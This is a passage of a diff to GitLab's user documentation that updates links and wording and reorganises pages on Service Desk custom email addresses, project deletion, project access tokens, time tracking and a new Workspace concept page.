[Added](https://gitlab.com/gitlab-org/gitlab/-/issues/215514) ability to specify individual requirements and their statuses in [GitLab Ultimate](https://about.gitlab.com/pricing/) 13.2. -GitLab supports [requirements test reports](../../../ci/yaml/README.md#artifactsreportsrequirements) now. +GitLab supports [requirements test reports](../../../ci/yaml/index.md#artifactsreportsrequirements) now. You can add a job to your CI pipeline that, when triggered, marks all existing requirements as Satisfied (you may manually satisfy a requirement in the edit form [edit a requirement](#edit-a-requirement)). diff --git a/doc/user/project/service_desk.md b/doc/user/project/service_desk.md index dd646a54b43..d46e55ca005 100644 --- a/doc/user/project/service_desk.md +++ b/doc/user/project/service_desk.md @@ -147,7 +147,7 @@ To use a custom issue template with Service Desk, in your project: 1. Go to **Settings > General > Service Desk**. 1. From the dropdown **Template to append to all Service Desk issues**, select your template. -### Using custom email display name +### Using a custom email display name > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/7529) in GitLab 12.8. @@ -160,22 +160,29 @@ To edit the custom email display name: 1. Enter a new name in **Email display name**. 1. Select **Save Changes**. -### Using custom email address **(FREE SELF)** +### Using a custom email address **(FREE SELF)** > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/2201) in GitLab Premium 13.0. > - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/284656) in GitLab 13.8. -If the `service_desk_email` is configured, then you can create Service Desk -issues by sending emails to the Service Desk email address. The default -address has the following format: -`project_contact+%{key}@example.com`. +It is possible to customize the email address used by Service Desk. To do this, you must configure +both a [custom mailbox](#configuring-a-custom-mailbox) and a +[custom suffix](#configuring-a-custom-email-address-suffix). -The `%{key}` part is used to find the project where the issue should be created. The -`%{key}` part combines the path to the project and configurable project name suffix: -`<project_full_path>-<project_name_suffix>`. +#### Configuring a custom mailbox -You can set the project name suffix in your project's Service Desk settings. -It can contain only lowercase letters (`a-z`), numbers (`0-9`), or underscores (`_`). +NOTE: +On GitLab.com a custom mailbox is already configured with `contact-project+%{key}@incoming.gitlab.com` as the email address, so you only have to configure the +[custom suffix](#configuring-a-custom-email-address-suffix) in project settings. + +Using the `service_desk_email` configuration, you can customize the mailbox +used by Service Desk. This allows you to have a separate email address for +Service Desk by also configuring a [custom suffix](#configuring-a-custom-email-address-suffix) +in project settings. + +The `address` must include the `+%{key}` placeholder within the 'user' +portion of the address, before the `@`. This is used to identify the project +where the issue should be created. NOTE: The `service_desk_email` and `incoming_email` configurations should @@ -183,7 +190,7 @@ always use separate mailboxes. This is important, because emails picked from `service_desk_email` mailbox are processed by a different worker and it would not recognize `incoming_email` emails. -To configure a custom email address for Service Desk with IMAP, add the following snippets to your configuration file: +To configure a custom mailbox for Service Desk with IMAP, add the following snippets to your configuration file in full: - Example for installations from source: @@ -207,57 +214,37 @@ To configure a custom email address for Service Desk with IMAP, add the followin ```ruby gitlab_rails['service_desk_email_enabled'] = true - gitlab_rails['service_desk_email_address'] = "project_contact+%{key}@gmail.com" - gitlab_rails['service_desk_email_email'] = "project_support@gmail.com" - gitlab_rails['service_desk_email_password'] = "[REDACTED]" - gitlab_rails['service_desk_email_mailbox_name'] = "inbox" - gitlab_rails['service_desk_email_idle_timeout'] = 60 - gitlab_rails['service_desk_email_log_file'] = "/var/log/gitlab/mailroom/mail_room_json.log" - gitlab_rails['service_desk_email_host'] = "imap.gmail.com" - gitlab_rails['service_desk_email_port'] = 993 - gitlab_rails['service_desk_email_ssl'] = true - gitlab_rails['service_desk_email_start_tls'] = false ``` -In this case, suppose the `mygroup/myproject` project Service Desk settings has the project name -suffix set to `support`, and a user sends an email to `project_contact+mygroup-myproject-support@example.com`. -As a result, a new Service Desk issue is created from this email in the `mygroup/myproject` project. - The configuration options are the same as for configuring [incoming email](../../administration/incoming_email.md#set-it-up). -#### Microsoft Graph +##### Microsoft Graph > Introduced in [GitLab 13.11](https://gitlab.com/gitlab-org/gitlab/-/issues/214900) Service Desk can be configured to read Microsoft Exchange Online mailboxes with the Microsoft -Graph API instead of IMAP. Follow the [documentation in the incoming e-mail section for setting up an OAuth2 application for Microsoft Graph](../../administration/incoming_email.md#microsoft-graph). +Graph API instead of IMAP. Follow the [documentation in the incoming email section for setting up an OAuth2 application for Microsoft Graph](../../administration/incoming_email.md#microsoft-graph). - Example for Omnibus GitLab installations: ```ruby gitlab_rails['service_desk_email_enabled'] = true - gitlab_rails['service_desk_email_address'] = "project_contact+%{key}@example.onmicrosoft.com" - gitlab_rails['service_desk_email_email'] = "project_contact@example.onmicrosoft.com" - gitlab_rails['service_desk_email_mailbox_name'] = "inbox" - gitlab_rails['service_desk_email_log_file'] = "/var/log/gitlab/mailroom/mail_room_json.log" - gitlab_rails['service_desk_inbox_method'] = 'microsoft_graph' - gitlab_rails['service_desk_inbox_options'] = { 'tenant_id': '<YOUR-TENANT-ID>', 'client_id': '<YOUR-CLIENT-ID>', @@ -268,6 +255,22 @@ Graph API instead of IMAP. Follow the [documentation in the incoming e-mail sect The Microsoft Graph API is not yet supported in source installations. See [this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/326169) for more details. +#### Configuring a custom email address suffix + +You can set a custom suffix in your project's Service Desk settings once you have configured a [custom mailbox](#configuring-a-custom-mailbox). +It can contain only lowercase letters (`a-z`), numbers (`0-9`), or underscores (`_`). + +When configured, the custom suffix creates a new Service Desk email address, consisting of the +`service_desk_email_address` setting and a key of the format: `<project_full_path>-<custom_suffix>` + +For example, suppose the `mygroup/myproject` project Service Desk settings has the following configured: + +- Project name suffix is set to `support`. +- Service Desk email address is configured to `contact+%{key}@example.com`. + +The Service Desk email address for this project is: `contact+mygroup-myproject-support@example.com`. +The [incoming email](../../administration/incoming_email.md) address still works. + ## Using Service Desk You can use Service Desk to [create an issue](#as-an-end-user-issue-creator) or [respond to one](#as-a-responder-to-the-issue). diff --git a/doc/user/project/settings/import_export.md b/doc/user/project/settings/import_export.md index 890784cecf5..d5fdb86c9b0 100644 --- a/doc/user/project/settings/import_export.md +++ b/doc/user/project/settings/import_export.md @@ -110,7 +110,7 @@ and the exports between them are compatible. You can export projects from the [Community Edition to the Enterprise Edition](https://about.gitlab.com/install/ce-or-ee/) and vice versa. This assumes [version history](#version-history) requirements are met. -If you're exporting a project from the Enterprise Edition to the Community Edition, you may lose data that is retained only in the Enterprise Edition. For more information, see [downgrading from EE to CE](../../../README.md). +If you're exporting a project from the Enterprise Edition to the Community Edition, you may lose data that is retained only in the Enterprise Edition. For more information, see [downgrading from EE to CE](../../../index.md). ## Exported contents @@ -156,7 +156,7 @@ To export a project and its data, follow these steps:  -1. Once the export is generated, you should receive an e-mail with a link to +1. Once the export is generated, you should receive an email with a link to download the file:  @@ -183,7 +183,7 @@ To export a project and its data, follow these steps: NOTE: If use of the `Internal` visibility level -[is restricted](../../../public_access/public_access.md#restricting-the-use-of-public-or-internal-projects), +[is restricted](../../../public_access/public_access.md#restrict-use-of-public-or-internal-projects), all imported projects are given the visibility of `Private`. NOTE: diff --git a/doc/user/project/settings/index.md b/doc/user/project/settings/index.md index 03a77e42765..d79d9f5b9dc 100644 --- a/doc/user/project/settings/index.md +++ b/doc/user/project/settings/index.md @@ -165,7 +165,7 @@ cannot change them: - Includes any jobs that drive the logic of your job. - Explicitly set the container image file to run the job in. This ensures that your script steps execute in the correct environment. -- Explicitly set any relevant GitLab pre-defined [job keywords](../../../ci/yaml/README.md#job-keywords). +- Explicitly set any relevant GitLab pre-defined [job keywords](../../../ci/yaml/index.md#job-keywords). This ensures that your job uses the settings you intend and that they are not overriden by project-level pipelines. @@ -188,8 +188,8 @@ Use the switches to enable or disable the following features: | **Issues** | ✓ | Activates the GitLab issues tracker | | **Repository** | ✓ | Enables [repository](../repository/) functionality | | **Merge Requests** | ✓ | Enables [merge request](../merge_requests/) functionality; also see [Merge request settings](#merge-request-settings) | -| **Forks** | ✓ | Enables [forking](../working_with_projects.md#fork-a-project) functionality | -| **Pipelines** | ✓ | Enables [CI/CD](../../../ci/README.md) functionality | +| **Forks** | ✓ | Enables [forking](../repository/forking_workflow.md) functionality | +| **Pipelines** | ✓ | Enables [CI/CD](../../../ci/index.md) functionality | | **Container Registry** | | Activates a [registry](../../packages/container_registry/) for your Docker images | | **Git Large File Storage** | | Enables the use of [large files](../../../topics/git/lfs/index.md#git-large-file-storage-lfs) | | **Packages** | | Supports configuration of a [package registry](../../../administration/packages/index.md#gitlab-package-registry-administration) functionality | @@ -251,7 +251,7 @@ Set up your project's merge request settings: - Enable [merge request approvals](../merge_requests/approvals/index.md). - Enable [status checks](../merge_requests/status_checks.md). - Enable [merge only if pipeline succeeds](../merge_requests/merge_when_pipeline_succeeds.md). -- Enable [merge only when all threads are resolved](../../discussions/index.md#only-allow-merge-requests-to-be-merged-if-all-threads-are-resolved). +- Enable [merge only when all threads are resolved](../../discussions/index.md#prevent-merge-unless-all-threads-are-resolved). - Enable [require an associated issue from Jira](../../../integration/jira/issues.md#require-associated-jira-issue-for-merge-requests-to-be-merged). - Enable [`delete source branch after merge` option by default](../merge_requests/getting_started.md#deleting-the-source-branch). - Configure [suggested changes commit messages](../merge_requests/reviews/suggestions.md#configure-the-commit-message-for-applied-suggestions). @@ -267,7 +267,8 @@ Learn how to [export a project](import_export.md#importing-the-project) in GitLa ### Advanced settings -Here you can run housekeeping, archive, rename, transfer, [remove a fork relationship](#removing-a-fork-relationship), or remove a project. +Here you can run housekeeping, archive, rename, transfer, +[remove a fork relationship](#removing-a-fork-relationship), or delete a project. #### Archiving a project @@ -363,28 +364,54 @@ namespace if needed. #### Delete a project -NOTE: -Only project Owners and administrators have [permissions](../../permissions.md#project-members-permissions) to delete a project. +You can mark a project to be deleted. + +Prerequisite: + +- You must have at least the Owner role for a project. To delete a project: -1. Navigate to your project, and select **Settings > General > Advanced**. -1. In the "Delete project" section, click the **Delete project** button. +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > General**. +1. Expand **Advanced**. +1. In the "Delete project" section, select **Delete project**. 1. Confirm the action when asked to. -This action: +This action deletes a project including all associated resources (issues, merge requests, and so on). -- Deletes a project including all associated resources (issues, merge requests etc). -- From [GitLab 13.2](https://gitlab.com/gitlab-org/gitlab/-/issues/220382) on [Premium](https://about.gitlab.com/pricing/) or higher tiers, - group Owners can [configure](../../group/index.md#enable-delayed-project-removal) projects within a group - to be deleted after a delayed period. - When enabled, actual deletion happens after number of days - specified in [instance settings](../../admin_area/settings/visibility_and_access_controls.md#default-deletion-delay). +In [GitLab 13.2](https://gitlab.com/gitlab-org/gitlab/-/issues/220382) and later, on Premium or higher tiers, +group Owners can [configure](../../group/index.md#enable-delayed-project-removal) projects in a group +to be deleted after a delayed period. +When enabled, actual deletion happens after number of days +specified in [instance settings](../../admin_area/settings/visibility_and_access_controls.md#default-deletion-delay). WARNING: -The default behavior of [Delayed Project deletion](https://gitlab.com/gitlab-org/gitlab/-/issues/32935) in GitLab 12.6 was changed to +The default behavior of [delayed project deletion](https://gitlab.com/gitlab-org/gitlab/-/issues/32935) in GitLab 12.6 was changed to [Immediate deletion](https://gitlab.com/gitlab-org/gitlab/-/issues/220382) in GitLab 13.2. +#### Delete a project immediately **(PREMIUM)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/191367) in GitLab 14.1. + +If you don't want to wait, you can delete a project immediately. + +Prerequisites: + +- You must have at least the Owner role for a project. +- You have [marked the project for deletion](#delete-a-project). + +To immediately delete a project marked for deletion: + +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > General**. +1. Expand **Advanced**. +1. In the "Permanently delete project" section, select **Delete project**. +1. Confirm the action when asked to. + +Your project, its repository, and all related resources, including issues and merge requests, +are deleted. + #### Restore a project **(PREMIUM)** > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/32935) in GitLab 12.6. diff --git a/doc/user/project/settings/project_access_tokens.md b/doc/user/project/settings/project_access_tokens.md index d7121239610..5e045ee2455 100644 --- a/doc/user/project/settings/project_access_tokens.md +++ b/doc/user/project/settings/project_access_tokens.md @@ -8,20 +8,24 @@ type: reference, howto # Project access tokens NOTE: -Project access tokens are supported for self-managed instances on Free and above. They are also supported on GitLab SaaS Premium and above (excluding [trial licenses](https://about.gitlab.com/free-trial/)). +Project access tokens are supported for self-managed instances on Free and above. They are also supported on GitLab SaaS Premium and above (excluding [trial licenses](https://about.gitlab.com/free-trial/)). Self-managed Free instances should review their security and compliance policies with regards to [user self-enrollment](../../admin_area/settings/sign_up_restrictions.md#disable-new-sign-ups) and consider [disabling project access tokens](#enable-or-disable-project-access-token-creation) to lower potential abuse. -> - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/2587) in GitLab 13.0. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/210181) in GitLab 13.0. > - [Became available on GitLab.com](https://gitlab.com/gitlab-org/gitlab/-/issues/235765) in GitLab 13.5 for paid groups only. > - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/235765) in GitLab 13.5. WARNING: This feature might not be available to you. Check the **version history** note above for details. -Project access tokens are scoped to a project and can be used to authenticate with the [GitLab API](../../../api/README.md#personalproject-access-tokens). You can also use project access tokens with Git to authenticate over HTTP. +Project access tokens are scoped to a project and can be used to authenticate with the +[GitLab API](../../../api/index.md#personalproject-access-tokens). You can also use +project access tokens with Git to authenticate over HTTPS. If you are asked for a +username when authenticating over HTTPS, you can use any non-empty value because only +the token is needed. Project access tokens expire on the date you define, at midnight UTC. -For examples of how you can use a project access token to authenticate with the API, see the following section from our [API Docs](../../../api/README.md#personalproject-access-tokens). +For examples of how you can use a project access token to authenticate with the API, see the following section from our [API Docs](../../../api/index.md#personalproject-access-tokens). ## Creating a project access token @@ -29,17 +33,21 @@ For examples of how you can use a project access token to authenticate with the 1. Navigate to the project you would like to create an access token for. 1. In the **Settings** menu choose **Access Tokens**. 1. Choose a name and optional expiry date for the token. +1. Choose a role for the token. 1. Choose the [desired scopes](#limiting-scopes-of-a-project-access-token). 1. Click the **Create project access token** button. 1. Save the project access token somewhere safe. Once you leave or refresh - the page, you won't be able to access it again. + the page, you don't have access to it again. ## Project bot users +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/210181) in GitLab 13.0. +> - [Excluded from license seat use](https://gitlab.com/gitlab-org/gitlab/-/issues/223695) in GitLab 13.5. + Project bot users are [GitLab-created service accounts](../../../subscriptions/self_managed/index.md#billable-users) and do not count as licensed seats. For each project access token created, a bot user is created and added to the project with -[Maintainer level permissions](../../permissions.md#project-members-permissions). +the [specified level permissions](../../permissions.md#project-members-permissions). For the bot: diff --git a/doc/user/project/time_tracking.md b/doc/user/project/time_tracking.md index b7fd14ae74b..29aedb33003 100644 --- a/doc/user/project/time_tracking.md +++ b/doc/user/project/time_tracking.md @@ -6,16 +6,12 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Time Tracking +# Time tracking **(FREE)** -> Introduced in GitLab 8.14. +With time tracking you can track estimates and time spent on issues and merge +requests in GitLab. -Time Tracking allows you to track estimates and time spent on issues and merge -requests within GitLab. - -## Overview - -Time Tracking allows you to: +Use time tracking for these tasks: - Record the time spent working on an issue or a merge request. - Add an estimate of the amount of time needed to complete an issue or a merge @@ -24,14 +20,13 @@ Time Tracking allows you to: You don't have to indicate an estimate to enter the time spent, and vice versa. -Data about time tracking is shown on the issue/merge request sidebar, as shown -below. +Data about time tracking shows up on the issue and merge request sidebar:  ## How to enter data -Time Tracking uses two [quick actions](quick_actions.md): `/spend` and `/estimate`. +Time tracking uses two [quick actions](quick_actions.md): `/spend` and `/estimate`. If you use either quick action more than once in a single comment, only the last occurrence is applied. @@ -44,9 +39,10 @@ with [Reporter and higher permission levels](../permissions.md). ### Estimates -To enter an estimate, write `/estimate`, followed by the time. For example, if -you need to enter an estimate of 1 month, 2 weeks, 3 days, 4 hours and 5 minutes, -write `/estimate 1mo 2w 3d 4h 5m`. +To enter an estimate, type `/estimate`, followed by the time. + +For example, if you need to enter an estimate of 1 month, 2 weeks, 3 days, 4 hours, and 5 minutes, +type `/estimate 1mo 2w 3d 4h 5m`. Check the [time units you can use](#configuration). Every time you enter a new time estimate, any previous time estimates are @@ -57,21 +53,22 @@ To remove an estimation entirely, use `/remove_estimate`. ### Time spent -To enter time spent, write `/spend`, followed by the time. For example, if you need -to log 1 month, 2 weeks, 3 days, 4 hours and 5 minutes, you would write `/spend 1mo 2w 3d 4h 5m`. -Time units that we support are listed at the bottom of this help page. +To enter time spent, type `/spend`, followed by the time. + +For example, if you need +to log 1 month, 2 weeks, 3 days, 4 hours, and 5 minutes, type `/spend 1mo 2w 3d 4h 5m`. +Check the [time units you can use](#configuration). Every new time spent entry is added to the current total time spent for the issue or the merge request. -You can remove time by entering a negative amount: for example, `/spend -3d` removes three +To subtract time, enter a negative value. For example, `/spend -3d` removes three days from the total time spent. You can't go below 0 minutes of time spent, -so GitLab automatically resets the time spent if you remove a larger amount -of time compared to the time that was entered already. +so if you remove more time than already entered, GitLab ignores the subtraction. You can log time in the past by providing a date after the time. For example, if you want to log 1 hour of time spent on the 31 January 2021, -you would write `/spend 1h 2021-01-31`. If you supply a date in the future, the +you would type `/spend 1h 2021-01-31`. If you supply a date in the future, the command fails and no time is logged. To remove all the time spent at once, use `/remove_time_spent`. @@ -97,13 +94,13 @@ The breakdown of spent time is limited to a maximum of 100 entries. The following time units are available: -- Months (mo) -- Weeks (w) -- Days (d) -- Hours (h) -- Minutes (m) - -Default conversion rates are 1mo = 4w, 1w = 5d and 1d = 8h. +| Time unit | What to type | Default conversion rate | +| --------- | ------------ | ----------------------- | +| Month | `mo` | 4w | +| Week | `w` | 5d | +| Day | `d` | 8h | +| Hour | `h` | 60m | +| Minute | `m` | | ### Limit displayed units to hours **(FREE SELF)** @@ -121,11 +118,11 @@ To do so: With this option enabled, `75h` is displayed instead of `1w 4d 3h`. -## Other interesting links +## Related links -- [Time Tracking solutions page](https://about.gitlab.com/solutions/time-tracking/) -- Time Tracking GraphQL references: +- [Time tracking solutions page](https://about.gitlab.com/solutions/time-tracking/) +- Time tracking GraphQL references: - [Connection](../../api/graphql/reference/index.md#timelogconnection) - [Edge](../../api/graphql/reference/index.md#timelogedge) - [Fields](../../api/graphql/reference/index.md#timelog) - - [Group Timelogs](../../api/graphql/reference/index.md#grouptimelogs) + - [Group timelogs](../../api/graphql/reference/index.md#grouptimelogs) diff --git a/doc/user/project/web_ide/index.md b/doc/user/project/web_ide/index.md index 0e597725611..722505304c0 100644 --- a/doc/user/project/web_ide/index.md +++ b/doc/user/project/web_ide/index.md @@ -331,7 +331,7 @@ The [File Sync](#file-syncing-to-web-terminal) feature is supported on Kubernete In order to enable the Web IDE terminals you need to create the file `.gitlab/.gitlab-webide.yml` inside the repository's root. This -file is fairly similar to the [CI configuration file](../../../ci/yaml/README.md) +file is fairly similar to the [CI configuration file](../../../ci/yaml/index.md) syntax but with some restrictions: - No global blocks (such as `before_script` or `after_script`) can be defined. diff --git a/doc/user/project/wiki/index.md b/doc/user/project/wiki/index.md index ed6a51665bd..527db38c980 100644 --- a/doc/user/project/wiki/index.md +++ b/doc/user/project/wiki/index.md @@ -44,7 +44,7 @@ users see when viewing the wiki: ## Create a new wiki page -Users with Developer [permissions](../../permissions.md) can create new wiki pages: +Users with the [Developer role](../../permissions.md) can create new wiki pages: 1. Go to your project or group and select **Wiki**. 1. Select **New page** on this page, or any other wiki page. @@ -108,7 +108,7 @@ may not be able to check out the wiki locally afterward. ## Edit a wiki page -You need Developer [permissions](../../permissions.md) or higher to edit a wiki page: +You need the [Developer role](../../permissions.md) or higher to edit a wiki page: 1. Go to your project or group and select **Wiki**. 1. Go to the page you want to edit. @@ -133,7 +133,7 @@ You need the [Maintainer role](../../permissions.md) or higher to delete a wiki ## Move a wiki page -You need Developer [permissions](../../permissions.md) or higher to move a wiki page: +You need the [Developer role](../../permissions.md) or higher to move a wiki page: 1. Go to your project or group and select **Wiki**. 1. Go to the page you want to move. @@ -234,7 +234,7 @@ wikis, with a few limitations: For updates, follow [the epic that tracks feature parity with project wikis](https://gitlab.com/groups/gitlab-org/-/epics/2782). -Group wikis can be edited by members with [Developer permissions](../../permissions.md#group-members-permissions) +Group wikis can be edited by members with the [Developer role](../../permissions.md#group-members-permissions) and above. Group wiki repositories can be moved using the [Group repository storage moves API](../../../api/group_repository_storage_moves.md). diff --git a/doc/user/project/working_with_projects.md b/doc/user/project/working_with_projects.md index a0b20f5c86d..08b63bfed5f 100644 --- a/doc/user/project/working_with_projects.md +++ b/doc/user/project/working_with_projects.md @@ -14,12 +14,17 @@ code are saved in projects, and most features are in the scope of projects. You can explore other popular projects available on GitLab. To explore projects: 1. On the top bar, select **Menu > Project**. -1. Select **Explore Projects**. +1. Select **Explore projects**. GitLab displays a list of projects, sorted by last updated date. To view projects with the most [stars](#star-a-project), click **Most stars**. To view projects with the largest number of comments in the past month, click **Trending**. +NOTE: +By default, `/explore` is visible to unauthenticated users. However, if the +[**Public** visibility level](../admin_area/settings/visibility_and_access_controls.md#restricted-visibility-levels) +is restricted, `/explore` is visible only to signed-in users. + ## Create a project To create a project in GitLab: @@ -84,7 +89,7 @@ Built-in templates are project templates that are: - Developed and maintained in the [`project-templates`](https://gitlab.com/gitlab-org/project-templates) and [`pages`](https://gitlab.com/pages) groups. - Released with GitLab. -- Anyone can contribute a built-in template by following [these steps](https://about.gitlab.com/community/contribute/project-templates). +- Anyone can contribute a built-in template by following [these steps](https://about.gitlab.com/community/contribute/project-templates/). To use a built-in template on the **New project** page: @@ -148,7 +153,7 @@ and then [cloning the repository](../../gitlab-basics/start-using-git.md#clone-a locally, you can directly push it to GitLab to create the new project, all without leaving your terminal. If you have access rights to the associated namespace, GitLab automatically creates a new project under that GitLab namespace with its visibility -set to Private by default (you can later change it in the [project's settings](../../public_access/public_access.md#how-to-change-project-visibility)). +set to Private by default (you can later change it in the [project's settings](../../public_access/public_access.md#change-project-visibility)). This can be done by using either SSH or HTTPS: diff --git a/doc/user/search/advanced_search.md b/doc/user/search/advanced_search.md index 20a2a7263c3..bb74a035121 100644 --- a/doc/user/search/advanced_search.md +++ b/doc/user/search/advanced_search.md @@ -12,6 +12,7 @@ type: reference NOTE: This is the user documentation. To configure the Advanced Search, visit the [administrator documentation](../../integration/elasticsearch.md). +Advanced Search is enabled in GitLab.com. GitLab Advanced Search expands on the Basic Search with an additional set of features for faster, more advanced searches across the entire GitLab instance @@ -34,6 +35,11 @@ The Advanced Search can be useful in various scenarios: Advanced Search is based on Elasticsearch, which is a purpose-built full text search engine that can be horizontally scaled so that it can provide search results in 1-2 seconds in most cases. +- **Code Maintenance:** + Finding all the code that needs to be updated at once across an entire + instance can save time spent maintaining code. + This is especially helpful for organizations with more than 10 active projects. + This can also help build confidence is code refactoring to identify unknown impacts. - **Promote innersourcing:** Your company may consist of many different developer teams each of which has their own group where the various projects are hosted. Some of your applications diff --git a/doc/user/search/index.md b/doc/user/search/index.md index 0cdaa3150c5..d90841fae88 100644 --- a/doc/user/search/index.md +++ b/doc/user/search/index.md @@ -17,9 +17,9 @@ and to-do items are assigned to you:  -- **(issues)** **Issues**: The open issues assigned to you. -- **(merge-request-open)** **Merge requests**: The [merge requests](../project/merge_requests/index.md) assigned to you. -- **(todo-done)** **To-do items**: The [to-do items](../todos.md) assigned to you. +- **{issues}** **Issues**: The open issues assigned to you. +- **{merge-request-open}** **Merge requests**: The [merge requests](../project/merge_requests/index.md) assigned to you. +- **{todo-done}** **To-do items**: The [to-do items](../todos.md) assigned to you. When you click **Issues**, GitLab shows the opened issues assigned to you: @@ -39,9 +39,9 @@ in the search field in the upper right corner: ### Filtering issue and merge request lists -> - Filtering by Epics was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/195704) in [GitLab Ultimate](https://about.gitlab.com/pricing/) 12.9. -> - Filtering by child Epics was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/9029) in [GitLab Ultimate](https://about.gitlab.com/pricing/) 13.0. -> - Filtering by Iterations was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/118742) in GitLab 13.6. [Moved](../../subscriptions/bronze_starter.md) to GitLab Premium in 13.9. +> - Filtering by Epics was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/195704) in GitLab Ultimate 12.9. +> - Filtering by child Epics was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/9029) in GitLab Ultimate 13.0. +> - Filtering by Iterations was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/118742) in GitLab 13.6. Moved to GitLab Premium in 13.9. Follow these steps to filter the **Issues** and **Merge Requests** list pages in projects and groups: @@ -107,7 +107,7 @@ You can filter the **Issues** list to individual instances by their ID. For exam ### Filtering merge requests by approvers **(PREMIUM)** > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/9468) in GitLab 11.9. -> - [Moved](../../subscriptions/bronze_starter.md) to GitLab Premium in 13.9. +> - Moved to GitLab Premium in 13.9. To filter merge requests by an individual approver, you can type (or select from the dropdown) **Approver** and select the user. @@ -117,7 +117,7 @@ the dropdown) **Approver** and select the user. ### Filtering merge requests by "approved by" **(PREMIUM)** > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/30335) in GitLab 13.0. -> - [Moved](../../subscriptions/bronze_starter.md) to GitLab Premium in 13.9. +> - Moved to GitLab Premium in 13.9. To filter merge requests already approved by a specific individual, you can type (or select from the dropdown) **Approved-By** and select the user. diff --git a/doc/user/snippets.md b/doc/user/snippets.md index 4b3f9e78c7b..9fb6152168e 100644 --- a/doc/user/snippets.md +++ b/doc/user/snippets.md @@ -128,9 +128,9 @@ A single snippet can support up to 10 files, which helps keep related files toge If you need more than 10 files for your snippet, we recommend you create a [wiki](project/wiki/index.md) instead. Wikis are available for projects at all subscription levels, and [groups](project/wiki/index.md#group-wikis) for -[GitLab Premium](https://about.gitlab.com/pricing). +[GitLab Premium](https://about.gitlab.com/pricing/). -Snippets with multiple files display a file count in the [snippet list](http://snippets.gitlab.com/): +Snippets with multiple files display a file count in the [snippet list](https://gitlab.com/dashboard/snippets):  diff --git a/doc/user/todos.md b/doc/user/todos.md index 4227f46dfa8..719ab6f6e7c 100644 --- a/doc/user/todos.md +++ b/doc/user/todos.md @@ -52,11 +52,11 @@ A to-do item appears on your To-Do List when: pipeline succeeds. - [In GitLab 13.2](https://gitlab.com/gitlab-org/gitlab/-/issues/12136) and later, a merge request is removed from a - [merge train](../ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md), + [merge train](../ci/pipelines/merge_trains.md), and you're the user that added it. When several trigger actions occur for the same user on the same object (for -example, an issue), GitLab displays only the first action as a single to do +example, an issue), GitLab displays only the first action as a single to-do item. To-do item triggers aren't affected by [GitLab notification email settings](profile/notifications.md). @@ -99,7 +99,7 @@ You can also add the following to your To-Do List by clicking the **Add a to do* - [Epics](group/epics/index.md) - [Designs](project/issues/design_management.md) - + ## Marking a to-do item as done @@ -129,12 +129,12 @@ If no action is needed, you can manually mark the to-do item as done by clicking its corresponding **Done** button to have GitLab remove the item from your To-Do List. - + You can also mark a to-do item as done by clicking the **Mark as done** button in the sidebar of an issue, merge request, or epic. - + You can mark all your to-do items as done at once by clicking the **Mark all as done** button. @@ -147,9 +147,9 @@ You can use the following types of filters with your To-Do List: | ------- | ---------------------------------------------------------------- | | Project | Filter by project. | | Group | Filter by group. | -| Author | Filter by the author that triggered the to do. | +| Author | Filter by the author that triggered the to-do item. | | Type | Filter by issue, merge request, design, or epic. | -| Action | Filter by the action that triggered the to do. | +| Action | Filter by the action that triggered the to-do item. | You can also filter by more than one of these at the same time. The previously described [triggering actions](#what-triggers-a-to-do-item) include: diff --git a/doc/user/workspace/img/1.1-Instance_overview.png b/doc/user/workspace/img/1.1-Instance_overview.png Binary files differnew file mode 100644 index 00000000000..7612cc7c092 --- /dev/null +++ b/doc/user/workspace/img/1.1-Instance_overview.png diff --git a/doc/user/workspace/img/1.2-Groups_overview.png b/doc/user/workspace/img/1.2-Groups_overview.png Binary files differnew file mode 100644 index 00000000000..b4f034bba16 --- /dev/null +++ b/doc/user/workspace/img/1.2-Groups_overview.png diff --git a/doc/user/workspace/img/1.3-Admin.png b/doc/user/workspace/img/1.3-Admin.png Binary files differnew file mode 100644 index 00000000000..018ed8a1bfc --- /dev/null +++ b/doc/user/workspace/img/1.3-Admin.png diff --git a/doc/user/workspace/img/Admin_Settings.png b/doc/user/workspace/img/Admin_Settings.png Binary files differnew file mode 100644 index 00000000000..5c4656ff342 --- /dev/null +++ b/doc/user/workspace/img/Admin_Settings.png diff --git a/doc/user/workspace/index.md b/doc/user/workspace/index.md new file mode 100644 index 00000000000..f098cef6053 --- /dev/null +++ b/doc/user/workspace/index.md @@ -0,0 +1,34 @@ +--- +stage: Manage +group: Access +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Workspace + +Workspace will be the top-level [namespace](../group/index.md#namespaces) for you to manage +everything GitLab, including: + +- Defining and applying settings to all of your groups, subgroups, and projects. +- Aggregating data from all your groups, subgroups, and projects. + +Workspace will take many of the features from the +[Admin Area](../admin_area/index.md), and there will be one workspace per: + +- Instance, for self-managed instances. +- Namespace, for GitLab.com. + +NOTE: +Workspace is currently in development. + +## Concept previews + +The following provide a preview to the Workspace concept. + + + + + + + + |
